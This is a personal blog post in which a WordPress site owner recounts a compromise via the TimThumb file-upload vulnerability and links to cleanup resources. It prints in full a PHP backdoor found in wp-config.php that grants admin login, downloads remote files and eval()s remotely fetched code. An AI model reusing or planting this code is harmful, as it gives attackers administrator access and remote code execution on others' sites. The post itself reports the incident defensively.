Reported attack site

Unfortunately some douche decided to ruin my day by exploiting this site via the zero day vulnerability found in thumbtim.php that can allow arbitrary file uploads. Yup, just like many self-hosting WordPress bloggers one of my plugins and themes was using the vulnerable thumbtim.php and ended up taking most of my day to — with the help of other victims — restore the site from with a fresh and shiny clean install. I’ll have to admit that the site being compromised was due to laziness on my part. Even so, its not cool to mess things up for someone with not a lot of time to keep everything in check. Bastards!

A few days ago i noticed that the anti-virus/malware programs kept making a fuss when i viewed this site on my Windows machines. I didn’t think much of it at the time. A couple days later Google protested and flagged the site as a a Reported Malware site. I also noticed the back-end acting a bit funky. Googling for answers gave me some clues. Luckily I stumbled upon Blake Embrey’s site where I found out about the thumbtim.php exploit. He also links this really good tech site blog.sucuri.net who much like him I advise you to follow.

Before anything else, if you suspect your site has been compromised read this article by sucuri Timthumb.php Security Vulnerability – Just the Tip of the Iceberg then run their script to check for thumbtin.php Sucuri WP_Check, you should also check out Bremley’s Warning: Something’s Not Right Here! where he describes in detail the steps he took to remove the infection.

As for me i just decided to start from scratch. First of all I discovered this code in wp-config.php file


if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

As soon as I saw “GET pass” I knew the site had been hacked. I’ll update this later on with the steps I took tohave my site re-evaluated by Google so it would not be marked as malware. For now read the links I provided since they provide excellent removal information. Have you been a  victim of this exploit as well? Leave your comments below.

« »